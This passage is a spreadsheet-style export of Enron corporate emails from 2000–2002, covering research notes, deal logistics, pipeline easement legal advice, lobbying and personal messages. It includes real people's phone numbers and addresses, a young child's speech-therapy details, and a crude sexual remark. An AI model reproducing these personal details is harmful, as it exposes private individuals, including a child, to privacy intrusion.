3. Credit Spreads Continue to Improve   Importantly, while our IPP equity_x000D_
composite has traded off more than 10% over the last few weeks, IPP credit_x000D_
spreads continue to tighten.  For example, while Calpine shares have traded_x000D_
off 11% since July 6, the spreads on CPN's 10 year 8.5% notes due 2011 have_x000D_
actually tightened by about 40 basis points.  We regard this movement as_x000D_
bullish from an equity perspective._x000D_
_x000D_
4. Q2 Earnings Reported for AES, CPN, NRG and PPL   Last week second quarter_x000D_
earnings results were reported by AES, Calpine, NRG Energy and PPL.  Upside_x000D_
surprises were reported by AES, CPN, and NRG.  Versus expectations, CPN's_x000D_
results were the strongest coming in 30% above our estimate.  While AES's_x000D_
results were 14% above our estimate, we reduced our 2001 full-year forecast_x000D_
owing to currency weakness in Brazil._x000D_
_x000D_
5. Looking Ahead: Q2 Results Expected from BKH, CNL, DPL, ETR, MIR and ORN_x000D_
This week we await earnings reports from Black Hills, Cleco, DPL, Entergy,_x000D_
Mirant and Orion Power.  We do not expect any major upside or downside_x000D_
surprises from this group.  In particular, our estimates for BKH, ETR and_x000D_
MIR are in-line with company guidance that had been publicly reaffirmed over_x000D_
the last few weeks._x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Neil Stein   212/325-4217_x000D_
Bryan Sifert   212/325-3906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IPW073001.pdf</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 03:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stamer@wharton.upenn.edu', 'weigelt@wharton.upenn.edu', 'baltes@wharton.upenn.edu', 'piazze@wharton.upenn.edu', 'tcara@wharton.upenn.edu', 'amit@wharton.upenn.edu', 'gohne@wharton.upenn.edu', 'kunreuth@wharton.upenn.edu', 'windj@wharton.upenn.edu', 'winter@wharton.upenn.edu', 'macmilli@wharton.upenn.edu'})</t>
  </si>
  <si>
    <t>Visit by Enron, 19 October 2000</t>
  </si>
  <si>
    <t>A team of key executives from Enron will be on campus on the 19th of October _x000D_
for the purposes of meeting with key staff and faculty to learn more about _x000D_
the School and how the firm can gain a greater presence here.  Included in _x000D_
this group will be:_x000D_
_x000D_
Vince Kaminski, Director of Research_x000D_
_x000D_
Christie Patrick, VP, University Relations_x000D_
_x000D_
Mike Rosen, Director, University Affairs Group_x000D_
_x000D_
I have developed a proposed agenda for the visit.  Please review and confirm _x000D_
that you are available to meet with one or more of the Enron Team at the _x000D_
times specified.  If so, please provide me a prefered meeting location.  If _x000D_
not, please alternate times and locations._x000D_
_x000D_
8:00-9:00  Breakfast with Donna Piazze and Keith Weigelt to discuss "Tiger _x000D_
Team FAP Project"  The Ivy Grill, Inn at Penn_x000D_
_x000D_
9:00-10:30  Meeting with Raffi Amit, Ian MacMillan, Emily Cieri and Anne _x000D_
Stamer to discuss the Sol C. Snider Entreprenuer Center and its related _x000D_
programs, the Business Plan Competition and WeBI...4th Floor Conference Room, _x000D_
Vance Hall???_x000D_
_x000D_
10:30-12:00 Christie and Mike hold discussions with Cara Tyler, Bob Bonner _x000D_
and Pat Rose regarding recruiting processes and procedures...CMS Conference _x000D_
Room_x000D_
_x000D_
10:30-???  Broadband executive meets with Gerry McCartney and other _x000D_
university officials to discuss campus needs, future usage projections, etc._x000D_
_x000D_
10:30-11:30  Vince meets with Sid Winter reference Jones Center and related _x000D_
research_x000D_
_x000D_
11:30-12:00  Vince meets with Howard Kunruether to discuss Risk Management_x000D_
_x000D_
12:00-1:15pm  Group lunch with Jerry Wind at Faculty Club to discuss the _x000D_
e-Fellows Program_x000D_
_x000D_
2:00-3:00pm Christie and Mike meet with Mike Baltes to discuss Co-branding _x000D_
issues with Wharton and UPenn_x000D_
_x000D_
5:00pm  All will attend the ET Conference Dinner event_x000D_
_x000D_
Please confirm your willingness and availability to support this agenda.  _x000D_
Thanks for your help._x000D_
_x000D_
TOM</t>
  </si>
  <si>
    <t>Mon, 17 Jul 2000 02:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.bills@enron.com'})</t>
  </si>
  <si>
    <t>Re: Peoples document</t>
  </si>
  <si>
    <t xml:space="preserve">I'm available anytime._x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Lisa Bills                           07/17/2000 09:13 AM_x000D_
	_x000D_
_x000D_
To: Thomas Suffield/Corp/Enron@ENRON_x000D_
cc: Roseann Engeldorf/Corp/Enron@ENRON, Kay Mann/Corp/Enron@Enron, Herman _x000D_
Manis/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Re: Peoples document  _x000D_
_x000D_
Thomas, given that I just put a call into you on the same subject matter, it _x000D_
would be helpful for my benefit, accounting's and legal's benefit and to try _x000D_
to be timely for the People's development team, if you would arrange a _x000D_
meeting as soon as possible so we can all get on the same page._x000D_
_x000D_
Thanks, Lisa_x000D_
_x000D_
_x000D_
_x000D_
Roseann Engeldorf_x000D_
07/17/2000 09:04 AM_x000D_
To: Thomas Suffield/Corp/Enron@ENRON_x000D_
cc: Lisa Bills/Corp/Enron@ENRON, Kay Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: Re: Peoples document  _x000D_
_x000D_
Are you available for a meeting today to discuss the captioned?   The lawyers _x000D_
are a bit unclear as to what the commercial ends and means are w.r.t. these _x000D_
turbines - e.g., do we have a DASH - do we want an option vs. a purchase, are _x000D_
we "stepping in" to the People's WLB structure or are they keeping the _x000D_
financing for "our benefit", etc?_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rose_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Jul 2001 20:19:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joe_b_fulmer@comerica.com'})</t>
  </si>
  <si>
    <t>RE: education plan</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Joe, I got it and sent it to my sister, and will follow up.  Regards,  Jeff_x000D_
_x000D_
-----Original Message----- _x000D_
From: &lt;Joe_B_Fulmer@comerica.com&gt;@ENRON _x000D_
Sent: Mon 7/23/2001 2:47 PM _x000D_
To: Shankman, Jeffrey A. _x000D_
Cc: _x000D_
Subject: education plan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Just wanted to follow up and make sure you received the new packet for your_x000D_
_x000D_
sister.  Any questions, please let me know.  713-220-5623_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 04:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Pinewood Manor</t>
  </si>
  <si>
    <t xml:space="preserve">PRIVILEGED ATTORNEY-CLIENT COMMUNICATION_x000D_
_x000D_
Steve, Karl and Tom_x000D_
_x000D_
I met with Karl this morning.  My suggestion is that, from this point _x000D_
forward, all communications with the trailer park should be coordinated with _x000D_
the legal department and all of our communications internally should be _x000D_
prefaced with "Attorney-Client Privileged Communication".   Any _x000D_
correspondence or information that I request from you or that you send me _x000D_
should be prefaced as "Attorney-Client Privileged".  Karl is to duplicate his _x000D_
file for me and to document dates on which conversations or meetings have _x000D_
taken place thus far.  I will draft a letter for Steve's signature to be sent _x000D_
to the owners of the trailer park and their attorney demanding that they _x000D_
immediately remove the two trailers that are sitting within 6' and 1' of the _x000D_
pipe centerline AND the two trailers that are within 16' of the pipe _x000D_
centerline.  In my opinion, you should strictly construe the terms of the _x000D_
right of way agreement which is of public record that states that the grantor _x000D_
shall not permit ANY housing or other structure to be within the right of _x000D_
way.  I also will advise them that the trees in the right of way are going to _x000D_
be removed.  I will endeavor to visit with Bud Wolcott and the Lumberton team _x000D_
regarding this matter._x000D_
_x000D_
Richard_x000D_
_x000D_
I am sending this to you as a "heads up" of possible litigation arising out _x000D_
of our demand for these trailer homes to be moved off of HPL's easement.    _x000D_
We have a 50' recorded easement prohibiting structures from being  on or _x000D_
within the right of way.  The engineer that designed the trailer park wrongly _x000D_
assumed it was only 30' wide.  Four trailers are within the easement.  Large _x000D_
pine trees are in the easement area and literally on top of the pipeline.  _x000D_
Obviously, it will be HPL's nickel to cut down the trees but I anticipate _x000D_
there may be a dispute as to who pays for the trailers to be moved out of the _x000D_
easement area.  They have retained an attorney; however, he has, thus far, _x000D_
not disputed HPL's right to prohibit structures within 25' of the pipe _x000D_
centerline.  Let me know if you need more details.  I'll keep you advised._x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
	Steve HPL Schneider_x000D_
	11/07/2000 08:30 AM_x000D_
		 _x000D_
		 To: Ann Elizabeth White/HOU/ECT@ECT_x000D_
		 cc: Tom Shelton/HOU/ECT@ECT_x000D_
		 Subject: Pinewood Manor_x000D_
_x000D_
PROTECTED - ATTORNEY/CLIENT PRIVILEDGE_x000D_
_x000D_
Karl will be coming to you to discuss the issues below.  We have several _x000D_
mobile homes that have been positioned and placed within our pipeline _x000D_
easement, one approximating a foot off the pipeline.  There are a couple that _x000D_
I think we should absolutely mandate to be moved.  For the remainder, I would _x000D_
like to mandate and require in writing the Park management to notify in _x000D_
writing those that remain encroached on the easement of the inherit dangers _x000D_
of a natural gas pipeline and their proximity to such.  Obviously, I am not _x000D_
trying to create a scare, as a scare is not warranted based on any known _x000D_
facts on this pipeline.  But I would believe that our liability may be _x000D_
expanded if we were not proactive and did not require the Park management to _x000D_
notify the clients that are encroaching of the circumstances upon which they _x000D_
exist.  Each person would therefore be informed about the circumstances _x000D_
surrounding them and would have made a conscientious decision to remain in _x000D_
spite of such circumstances.  Your thoughts on this please._x000D_
_x000D_
---------------------- Forwarded by Steve HPL Schneider/HOU/ECT on 11/07/2000 _x000D_
08:14 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Tom Shelton                           10/22/2000 10:47 AM_x000D_
	_x000D_
_x000D_
To: Karl E Atkins/NA/Enron@ENRON_x000D_
cc: Steve HPL Schneider/HOU/ECT@ECT, Calvin Dodd/GCO/Enron@Enron _x000D_
Subject: Pinewood Manor_x000D_
_x000D_
 I  don't know what the current status of the Pinewood Manor matter is, but _x000D_
Steve Schneider and I talked about it a little on Friday.  We think that if _x000D_
we are going to allow some minor encroachment (a very few mobile _x000D_
homes/trailers, not too close to the pipeline) onto HPL's 50-foot easement, _x000D_
then at a minimum we should get an encroachment agreement which includes:_x000D_
acknowledgement that HPL is not responsible for any damages resulting from _x000D_
the encroachments_x000D_
agreement that Pinewood Manor will be responsible for any incremental costs _x000D_
if the encroachments interfere with our operation, maintenance, etc., and _x000D_
will remove any encroachments as required by HPL in order for HPL to conduct _x000D_
its operations as it deems appropriate_x000D_
a commitment from the owners of Pinewood Manor that they will notify (in a _x000D_
document that HPL will provide) all present and future tenants about the _x000D_
pipeline_x000D_
_x000D_
Please let us know of any developments regarding this matter._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 03:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dave.fuller@enron.com', 'jeffrey.oh@enron.com'})</t>
  </si>
  <si>
    <t>Re: City of Mesa Update</t>
  </si>
  <si>
    <t xml:space="preserve">I just heard back from credit.... No e-dash is required.  So just let us know _x000D_
if you are wanting to transact today and we will speak with Mike._x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Eric Boyt_x000D_
01/22/2001 10:58 AM_x000D_
To: Dave Fuller/PDX/ECT@ECT, Jeffrey Oh/PDX/ECT@ECT_x000D_
cc: John Griffith/Corp/Enron@Enron, Louis Dicarlo/NA/Enron@ENRON, Jason R _x000D_
Williams/NA/Enron@ENRON _x000D_
_x000D_
Subject: City of Mesa Update_x000D_
_x000D_
Dave/Jeff,_x000D_
_x000D_
I spoke with Jason Williams (Enron Credit) and he confirmed there will be no _x000D_
credit reserve on the new index deal.  He is verifying that there is no need _x000D_
to "e-dash" the deal.  I will get back to you as soon as I hear word.  If one _x000D_
is required, we will help get the document pushed through the system._x000D_
_x000D_
The next step, if you and the City of Mesa are ready, is to get a firm quote _x000D_
from Mike Grigsby this afternoon._x000D_
_x000D_
Let me know._x000D_
_x000D_
Regards,_x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
PS - Attached is an e-dash.  If one is needed, you will need to complete the _x000D_
first section describing the deal.  As you can tell by the matrix, it does _x000D_
not appear an e-dash is necessary because the City of Mesa has a AA- rating _x000D_
and the transaction is approx $8 million and less than 1 year._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 02:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'knorris@ssfrancis.org'})</t>
  </si>
  <si>
    <t>Re: Michael</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kara,_x000D_
_x000D_
I haven't written because I haven't figured out what we learned at the _x000D_
meeting.  We can discuss next week at our conference.  We are arranging to _x000D_
have Michael re-tested.  I think it is more of an issue of a difference _x000D_
between potential and performance.  Michael has been tested in the past, and _x000D_
tests as extraordinarily bright, but he has had some performance issues which _x000D_
don't match up.  At least that's how I understand it. He just has some _x000D_
disconnects which we are working to overcome, but I must admit to not _x000D_
understanding it all._x000D_
_x000D_
I left you a note about Michael possibly missing next week.  After I dropped _x000D_
him off this am, I had a thought that next week might be when they visit in _x000D_
1st grade, in which case we probably wouldn't want him to miss that _x000D_
opportunity.  I think he is excited about 1st grade, so you must be doing a _x000D_
great job of getting the kids prepared._x000D_
_x000D_
Thanks for everything, and see you next week!_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kara Norris &lt;knorris@ssfrancis.org&gt; on 05/17/2001 03:49:09 PM_x000D_
To: Kay.Mann@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Michael_x000D_
_x000D_
Kay,_x000D_
I'm interested to hear how things went at the meeting._x000D_
Michael was the star of the show.  He did a great job!  Glad you both made_x000D_
it._x000D_
-Kara_x000D_
_x000D_
_x000D_
Kay.Mann@enron.com wrote:_x000D_
_x000D_
&gt; Hi Kara,_x000D_
&gt;_x000D_
&gt; Michael has been seeing a speech/language therapist, and recently she_x000D_
&gt; raised an issue about Michael's ability to "blend and unblend" sounds in_x000D_
&gt; words, specifically as it relates to reading readiness.  She had this_x000D_
&gt; conversation with Neil, so I don't know the details.  We are meeting with_x000D_
&gt; her today to get more input, but I wanted to mention it to you, just in_x000D_
&gt; case you had a comment._x000D_
&gt;_x000D_
&gt; I know this is something we can discuss at Michael's conference on May_x000D_
&gt; 31st, but if you would like to discuss it before hand, I can be reached at_x000D_
&gt; 713 304 8716 9 (cell), 713 345 -7566 (office - just tell my asst you are_x000D_
&gt; Michael's teacher), 713 973 6325._x000D_
&gt;_x000D_
&gt; Thanks so much,_x000D_
&gt;_x000D_
&gt; Kay_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 13 Jan 2002 13:36:51 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/13/02; HourAhead hour: 16;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/13/02; HourAhead hour: 16;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011316.txt</t>
  </si>
  <si>
    <t>Sat, 20 Oct 2001 05:04:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'heddamcallister@aol.com'})</t>
  </si>
  <si>
    <t>*EMCA* (no subject)</t>
  </si>
  <si>
    <t xml:space="preserve">Amy: Are we going to have the garage sale on the 27th from 7:00 AM to 12:00PM? _x000D_
At 7:00AM is still dark. Please, let me know. Thanks. Hedda at Bomar. _x000D_
_x000D_
Yahoo! Groups Sponsor	 _x000D_
ADVERTISEMENT_x000D_
Click Here! &lt;http://rd.yahoo.com/M=194081.1637497.3177299.1261774/D=egroupweb/S=1705044493:HM/A=795262/R=0/*http://www.ediets.com/start.cfm?code=3257&gt;	_x000D_
  &lt;http://us.adserver.yahoo.com/l?M=194081.1637497.3177299.1261774/D=egroupmail/S=1705044493:HM/A=795262/rand=943344296&gt;	_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
emca-unsubscribe@egroups.com_x000D_
_x000D_
_x000D_
_x000D_
Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service &lt;http://docs.yahoo.com/info/terms/&gt;. </t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 07:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'christiaan.huizer@enron.com', 'richard.lammers@enron.com', 'gabriela.aguilar@enron.com'})</t>
  </si>
  <si>
    <t>Re: Yabog Amendment - Letter to SIRESE</t>
  </si>
  <si>
    <t xml:space="preserve">This looks pretty administrative. Are we required to send this to the banks=_x000D_
?=20_x000D_
If so please proceed, Christian._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gabriela Aguilar_x000D_
01/05/2001 06:55 AM_x000D_
To: Rob G Gay/NA/Enron@Enron_x000D_
cc: =20_x000D_
_x000D_
Subject: Re: Yabog Amendment - Letter to SIRESE_x000D_
_x000D_
Rob,_x000D_
I want to fax you the letter mentioned down below. Could you give me your f=_x000D_
ax=20_x000D_
number ?_x000D_
Thanks, gaby_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Gabriela Aguilar/SA/Enron on 01/05/2001=_x000D_
=20_x000D_
09:55 AM ---------------------------_x000D_
_x000D_
_x000D_
Richard A Lammers_x000D_
01/04/2001 03:52 PM_x000D_
To: Gabriela Aguilar/SA/Enron@Enron_x000D_
cc: Federico Cerisoli/SA/Enron@Enron, dlefler@velaw.com, Christiaan=20_x000D_
Huizer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rob G Gay/NA/Enron@Enron=20_x000D_
Subject: Re: Yabog Amendment - Letter to SIRESE =20_x000D_
_x000D_
this looks fine to me. Please sure that Christiaan,Rob  and I receive final=_x000D_
=20_x000D_
copies for forwarding to the banks_x000D_
_x000D_
_x000D_
_x000D_
Gabriela Aguilar_x000D_
01/04/2001 02:10 PM_x000D_
To: Federico Cerisoli/SA/Enron@Enron, dlefler@velaw.com, Richard A=20_x000D_
Lammers/SA/Enron@Enron_x000D_
cc: =20_x000D_
Subject: Yabog Amendment - Letter to SIRESE_x000D_
_x000D_
Find attached the english version of the letter (in spanish) that Transrede=_x000D_
s=20_x000D_
sent to SIRESE. 99% of the letter sent to SIRESE reflects Dean=01%s draft.=_x000D_
=20_x000D_
Transredes only made slight changes._x000D_
_x000D_
Now we are waiting for SIRESE=01%s confirmation to the meeting._x000D_
_x000D_
_x000D_
 - Carta SIRESE-RespuestaTBStrd.doc_x000D_
_x000D_
Regards,_x000D_
gaby_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 05:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mona.petrochko@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Re: Enron's Amendments to the Alpert Bill</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Jeff Dasovich/SFO/EES on 08/18/2000 10:29 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Scott Govenar &lt;sgovenar@govadv.com&gt; on 08/18/2000 10:31:52 AM_x000D_
To: jdasovic@enron.com_x000D_
cc: MDay@GMSSR.com _x000D_
Subject: Re: Enron's Amendments to the Alpert Bill_x000D_
_x000D_
_x000D_
I have been told by the author's office that the Assembly is not going to _x000D_
bring_x000D_
up the bill today.  Governor Davis is having a signing ceremony in Los Angeles_x000D_
today for the new Caesar Chavez holiday so many of the latino members are out._x000D_
They need these members, baring a sudden change of heart by the Republican's,_x000D_
in order to achieve a 2/3 vote.  However, the bill is still on file for_x000D_
concurrence so we will monitor.  I'll let Sandi know._x000D_
_x000D_
Scott_x000D_
_x000D_
jdasovic@enron.com wrote:_x000D_
_x000D_
&gt; Thanks a million.  That's not good that they don't intend to take a_x000D_
&gt; position on the bill, since what happens in S.D. could end up happening_x000D_
&gt; later behind PG&amp;E and Edison, which could affect them significantly and_x000D_
&gt; negatively.  You may want to mention this to Sandi, who may want to follow_x000D_
&gt; up with Babs.  Thanks again for your help.  Any word on whether the_x000D_
&gt; Assembly is going to act today, and what they might act upon?_x000D_
&gt;_x000D_
&gt; Best,_x000D_
&gt; Jeff_x000D_
&gt;_x000D_
&gt; Scott Govenar &lt;sgovenar@govadv.com&gt; on 08/18/2000 09:21:58 AM_x000D_
&gt;_x000D_
&gt; To:   jdasovic@enron.com, Mike Day &lt;MDay@GMSSR.com&gt;_x000D_
&gt; cc:_x000D_
&gt; Subject:  Re: Enron's Amendments to the Alpert Bill_x000D_
&gt;_x000D_
&gt; Done.  Per Barbara Barkovich, she believes that the 20kw dividing line is_x000D_
&gt; too_x000D_
&gt; low, that in fact many of the businesses the legislators say are going_x000D_
&gt; broke_x000D_
&gt; are over 20kw.  This doesn't matter to them, but it was just an_x000D_
&gt; observation._x000D_
&gt; More importantly, they don't have any members in San Diego and are_x000D_
&gt; therefore_x000D_
&gt; not taking any positions on San Diego specific bills.  If it goes statewide_x000D_
&gt; she'll revisit it.  No word from Dorothy yet._x000D_
&gt;_x000D_
&gt; Scott_x000D_
&gt;_x000D_
&gt; jdasovic@enron.com wrote:_x000D_
&gt;_x000D_
&gt; &gt; Hi Scott:_x000D_
&gt; &gt; Sandi, Paul, Jim and I spoke yesterday and thought it would be a good_x000D_
&gt; idea_x000D_
&gt; &gt; to contact customer groups about our proposed amendments to the Alpert_x000D_
&gt; bill_x000D_
&gt; &gt; to see if we can get some other folks to support them (which we think we_x000D_
&gt; &gt; can).  My plan was to call them, explain what our amendments are_x000D_
&gt; attempting_x000D_
&gt; &gt; to do and ask them to sit tight until you and Sandi contacted them.  I_x000D_
&gt; have_x000D_
&gt; &gt; tried to get phone numbers from here in Houston but have struck out._x000D_
&gt; Could_x000D_
&gt; &gt; you call Bill Booth and Dorothy Rothrock and share the amendments with_x000D_
&gt; them_x000D_
&gt; &gt; that Mike Day drafted (and ask them to sit tight until you and Sandi get_x000D_
&gt; a_x000D_
&gt; &gt; chance to confer)?  Greatly appreciated.  If you have any questions you_x000D_
&gt; can_x000D_
&gt; &gt; page me at 888.916.7184.  Thanks very much._x000D_
&gt; &gt;_x000D_
&gt; &gt; Best,_x000D_
&gt; &gt; Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Aug 2001 13:08:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dave.perrino@enron.com', 'alan.comnes@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'elizabeth.sager@enron.com', 'b..sanders@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>FW: CAISO Notice - Underscheduling Penalty and PG&amp;E Bankruptcy_x000D_
 ClaimsBar Date</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the CAISO's documentation showing that EPMI is entitled to $33.8 million in underscheduling penalty revenues for the period of Jan-Apr '01._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Blair, Kit _x000D_
Sent: Tuesday, August 21, 2001 12:56 PM_x000D_
To: Hall, Steve C._x000D_
Subject: FW: CAISO Notice - Underscheduling Penalty and PG&amp;E Bankruptcy_x000D_
ClaimsBar Date_x000D_
_x000D_
_x000D_
_x000D_
Here you go._x000D_
_x000D_
-----Original Message-----_x000D_
From: Stokley, Chris _x000D_
Sent: Monday, August 20, 2001 3:20 PM_x000D_
To: Blair, Kit_x000D_
Subject: FW: CAISO Notice - Underscheduling Penalty and PG&amp;E Bankruptcy_x000D_
ClaimsBar Date_x000D_
_x000D_
_x000D_
Let me know if anyone has any questions on this information._x000D_
_x000D_
-----Original Message-----_x000D_
From: 	Almeida, Keoni [mailto:KAlmeida@caiso.com] _x000D_
Sent:	Friday, August 17, 2001 12:48 PM_x000D_
To:	Stokley, Chris; Emmert, Caroline_x000D_
Subject:	FW: CAISO Notice - Underscheduling Penalty and PG&amp;E Bankruptcy ClaimsBar Date_x000D_
_x000D_
  This is what will be sent out in the mail.  It is not as detailed as what I sent Chris previously.  This shows a payment to Enron.  _x000D_
Keoni Almeida _x000D_
California Independent System Operator _x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352 _x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
  </t>
  </si>
  <si>
    <t>Wed, 22 Mar 2000 00:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'buylow@houston.rr.com'})</t>
  </si>
  <si>
    <t>New Arrival??</t>
  </si>
  <si>
    <t>Hi out there,_x000D_
_x000D_
Welllllllll !!!_x000D_
_x000D_
What's the word?_x000D_
_x000D_
Assume baby is here and you are all kicked back with nothing going on _x000D_
(chuckle)._x000D_
_x000D_
When you have time give me a call (again chuckle)_x000D_
_x000D_
Ken_x000D_
_x000D_
 - att1.htm</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 09:57:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.j.moller@marshmc.com'})</t>
  </si>
  <si>
    <t>RE: Yo!</t>
  </si>
  <si>
    <t>It didn't down here b/c I watched it from 5:15 - 6pm unless it actually came_x000D_
on 4pm down here with the time difference.  I bet that's what happened._x000D_
_x000D_
KR_x000D_
_x000D_
-----Original Message-----_x000D_
From: Richard Moller [mailto:Richard.J.Moller@marshmc.com]_x000D_
Sent: Friday, October 05, 2001 9:27 AM_x000D_
To: Ruscitti, Kevin_x000D_
Subject: RE: Yo!_x000D_
_x000D_
_x000D_
Actually, it went on towards the end of the hour, about 5:45.  I can _x000D_
get you a copy._x000D_
_x000D_
&lt;&lt;&lt; Memo from Kevin.Ruscitti@enron.com on 05 October, 2001, 09:07 _x000D_
Friday &gt;&gt;&gt;_x000D_
_x000D_
_x000D_
Kevin.Ruscitti@enron.com on 5 Oct 2001, 09:07 Friday_x000D_
_x000D_
To:	Richard Moller _x000D_
cc:	  _x000D_
Subject:	RE: Yo!_x000D_
_x000D_
You'll never believe it but I turned it on at 5:10 so I guess your_x000D_
interview_x000D_
was over.  If you have a copy, please send me a copy and I'll pay you_x000D_
for it._x000D_
How's everything going?  Hope all is well.  Talk to you soon._x000D_
_x000D_
Kevin_x000D_
_x000D_
-----Original Message-----_x000D_
From: Richard Moller [mailto:Richard.J.Moller@marshmc.com]_x000D_
Sent: Thursday, October 04, 2001 4:04 PM_x000D_
To: Ruscitti, Kevin_x000D_
Subject: Yo!_x000D_
_x000D_
_x000D_
What's Happenin'?  Did you catch the interview on Fox?  The babe who_x000D_
interviewed me was sooooooooo hot that all I could think of was how_x000D_
good she must taste._x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant _x000D_
affiliate and may_x000D_
 contain confidential and privileged material for the sole use of the _x000D_
intended_x000D_
 recipient (s). Any review, use, distribution or disclosure by others is_x000D_
 strictly prohibited. If you are not the intended recipient (or _x000D_
authorized to_x000D_
 receive for the recipient), please contact the sender or reply to _x000D_
Enron Corp._x000D_
 at enron.messaging.administration@enron.com and delete all copies of _x000D_
the_x000D_
 message. This e-mail (and any attachments hereto) are not intended to _x000D_
be an_x000D_
 offer (or an acceptance) and do not create or evidence a binding and_x000D_
 enforceable contract between Enron Corp. (or any of its affiliates) _x000D_
and the_x000D_
 intended recipient or any other party, and may not be relied on by _x000D_
anyone as_x000D_
 the basis of a contract by estoppel or otherwise. Thank you._x000D_
**********************************************************************_x000D_
_x000D_
_x000D_
To:	Richard Moller/NYC-NY/US/Marsh/MMC@MMC_x000D_
cc:	 _x000D_
From:	Kevin.Ruscitti@enron.com</t>
  </si>
  <si>
    <t>Wed, 25 Jul 2001 13:02:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kenneth.deng@enron.com'})</t>
  </si>
  <si>
    <t>FW: EPRM course</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lorenzo Pascual Caneiro &lt;Lorenzo.Pascual.Caneiro@morganstanley.com&gt;@ENRON [mailto:IMCEANOTES-Lorenzo+20Pascual+20Caneiro+20+3CLorenzo+2EPascual+2ECaneiro+40morganstanley+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, July 25, 2001 12:46 PM_x000D_
To:	vkamins@enron.com_x000D_
Subject:	EPRM course_x000D_
_x000D_
Dear Prof. Kaminski,_x000D_
_x000D_
first of all, let me introduce myself. My name is Lorenzo Pascual and a_x000D_
collegue of mine and I attended the Energy Power Risk Management_x000D_
course that took place in London some weeks ago. About my CV,_x000D_
I have finished a Ph. D. in Mathematics (Statistics and Econometrics) at_x000D_
University Carlos_x000D_
III in Madrid (Spain), as well as a master degree in Mathematical_x000D_
Finance,_x000D_
both of them two months ago. In particular, in my dissertation I have_x000D_
developed_x000D_
new statistical techniques (using bootstrap methods) for forecasting_x000D_
returns and volatilities_x000D_
in the GARCH and Stochastic Volatility family of models. I have already_x000D_
one published_x000D_
article at the International Journal of Forecasting, and I have three_x000D_
more papers under_x000D_
revision in other international journals. Of course, if you are_x000D_
interested in this kind of_x000D_
research I can send to you a copy of the working papers._x000D_
Since then, I work for Endesa Trading_x000D_
(spanish electricity company based in Madrid). However, at this moment I_x000D_
am based here_x000D_
in London for two years working in a joint venture with Morgan Stanley._x000D_
_x000D_
During the course I had the pleasure to talk with you and you gave me_x000D_
the opportunity of_x000D_
asking you some of the questions and doubts I have about energy_x000D_
derivatives._x000D_
